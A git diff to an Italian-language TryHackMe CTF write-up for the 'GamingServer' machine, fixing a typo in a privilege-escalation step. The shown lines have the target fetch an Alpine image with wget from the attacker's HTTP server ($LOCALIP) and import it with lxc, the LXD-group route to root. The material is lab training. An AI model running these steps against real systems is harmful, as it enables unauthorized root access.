Update 6. Privilegie Escalation.md

--- a/CTF-TryHackMe/Easy/GamingServer/6. Privilegie Escalation.md
+++ b/CTF-TryHackMe/Easy/GamingServer/6. Privilegie Escalation.md
@@ -13,7 +13,7 @@
 ----> Nella Macchina Target(Entro prima nella cartella tmp: cd /tmp):
 
 5) Mi scarico il file "alpine-v3.13-x86_64-20210218_0139.tar.gz":
-  wget http://£LOCALIP:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
+  wget http://$LOCALIP:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
 
 6) Eseguo il file appena scaricato:
   lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz   --alias myimage
